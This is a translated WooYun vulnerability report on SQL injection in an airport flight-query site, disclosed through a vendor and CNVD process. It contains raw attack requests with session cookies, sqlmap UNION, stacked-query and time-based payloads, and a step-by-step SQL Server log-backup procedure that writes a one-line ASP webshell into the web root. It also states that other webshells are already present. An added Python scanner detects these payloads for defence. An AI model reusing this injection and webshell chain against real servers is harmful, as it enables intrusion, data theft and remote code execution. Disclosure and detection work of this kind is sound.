WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops article browser ---------------------- http://drop.zone.ci/
2014-05-16: Details sent to the vendor, awaiting vendor handling
2014-05-21: Vendor confirmed; details disclosed to the vendor only
2014-05-31: Details disclosed to core white hats and relevant domain experts
2014-06-10: Details disclosed to regular white hats
2014-06-20: Details disclosed to intern white hats
2014-06-30: Details disclosed to the public
A shopping site is hosted alongside the main site on the same server and was compromised along with it.
Injection point (every f_* parameter is injectable):
POST /m/departures.aspx HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 128
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/m/departures.aspx

f_txtFlightNumber=9876543210&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
sqlmap report:
---
Place: POST
Parameter: f_txtFlightNumber
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: f_txtFlightNumber=9876543210' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113)+CHAR(104)+CHAR(66)+CHAR(81)+CHAR(72)+CHAR(75)+CHAR(78)+CHAR(88)+CHAR(112)+CHAR(120)+CHAR(101)+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(105)+CHAR(113)-- &f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: f_txtFlightNumber=9876543210'; WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: f_txtFlightNumber=9876543210' WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
---
[14:31:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
GETSHELL method:
Log differential backup:
1. Put the current database into full recovery mode:
   [injection point];alter database db_airport set RECOVERY FULL--+
2. Create a table named cmd:
   [injection point];create table cmd (a image)--+
3. Back up the current database's log to c:\sql.bak:
   [injection point];backup log [current database] to disk = 'c:\sql.bak' with init--+
4. Insert the one-line shell into the cmd table just created:
   [injection point];insert into cmd (a) values ('<%execute(request("a"))%>')--+
5. Back up the log, now containing the one-line shell, into the site's web root:
   [injection point];backup log db_airport to disk = 'E:\wwwroot\website\104.asp'--+
6. Clean up:
   [injection point];drop table cmd--+
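The following is an added defender-side example, not part of the original report: it URL-decodes form bodies sent to the f_* parameters and flags the three probe shapes sqlmap reported above plus the stacked log-backup statements used in the GETSHELL steps. The sample bodies are constructed; the real remediation is parameterized queries in the departures/arrivals handlers, and this scanner only tells you when those handlers are being probed.

```python
import re
from urllib.parse import parse_qsl

# Signatures modelled on the payload shapes shown in this report
# (assumption: the flight-query form never legitimately carries these tokens).
SIGNATURES = {
    "union_probe": re.compile(r"'\s*UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "time_based": re.compile(r"WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "stacked_ddl": re.compile(
        r";\s*(alter\s+database|create\s+table|backup\s+log|insert\s+into|drop\s+table)\b",
        re.I,
    ),
}

def scan_form_body(body):
    """URL-decode one form-urlencoded body and return (parameter, signature) hits.

    Decoding first matters: the quote arrives as %27 and the trailing comment
    as '--+' or '--%2B'; the patterns only line up after parse_qsl unescapes them.
    """
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for sig_name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, sig_name))
    return hits

# Constructed sample bodies for the departures form; the three malicious ones
# mirror the UNION, WAITFOR and log-backup payloads from the report above.
SAMPLE_BODIES = {
    "benign": "f_txtFlightNumber=MU2121&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&x=0&y=0",
    "union": "f_txtFlightNumber=9876543210%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29--+&f_txtTerminus=x",
    "delay": "f_txtFlightNumber=9876543210%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&x=0",
    "backup": "f_txtFlightNumber=1%27%3Bbackup+log+db_airport+to+disk+%3D+%27c%3A%5Csql.bak%27+with+init--%2B",
}

def scan_all(bodies=SAMPLE_BODIES):
    """Run the scanner over every sample body; a non-empty list means 'alert'."""
    return {label: scan_form_body(body) for label, body in bodies.items()}

if __name__ == "__main__":
    for label, hits in scan_all().items():
        print(f"{label:7s} -> {hits or 'clean'}")
```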
Neighbouring shopping site: http://booking.xxia.com/ on the same server. Other injection points:
POST /m/arrivals.aspx HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 129
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/m/arrivals.aspx

f_txtFlightNumber=9876543210&f_txtDeparture=%E5%87%BA%E5%8F%91%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
Insert type:
POST /poll.aspx?q=submit HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 649
Accept: */*
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/poll.aspx
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

h_txt226=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E7%9B%AE%E5%89%8D%E6%9C%80%E9%9C%80%E6%8F%90%E5%8D%87%E7%9A%84%E6%9C%8D%E5%8A%A1%E6%98%AF%EF%BC%9A&txt226=1234&h_txt227=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E5%93%AA%E6%96%B9%E4%BE%BF%E6%9C%8D%E5%8A%A1%E8%AE%A9%E6%82%A8%E6%9C%80%E4%B8%BA%E8%AE%A4%E5%8F%AF%EF%BC%9A&txt227=1234&uname=&uemail=test%40altoromutual.com&uqq=1234&uphone=555-555-5555&item160=201&item60=61&item141=142&item153=165&item161=206&item81=82&item162=211&item111=112&item123=124&item135=136&item147=148&item159=195&item163=216&item63=64&item87=88&item156=180&item164=221&item72=73
Parameter cid:
GET /m/business.aspx?q=shoppinglist&cid=615
Someone else has already uploaded a full-featured webshell to the site, and more can be found in the web backup directory. The server also sits on the internal network and is connected to several query interfaces; the consequences of malicious exploitation are easy to imagine.
Fix suggestion: filtering.
Risk level: High
Vulnerability Rank: 11
Confirmation time: 2014-05-21 14:30
CNVD confirmed and reproduced the described situation; it has been passed by CNCERT to the Shaanxi branch center for handling.
None yet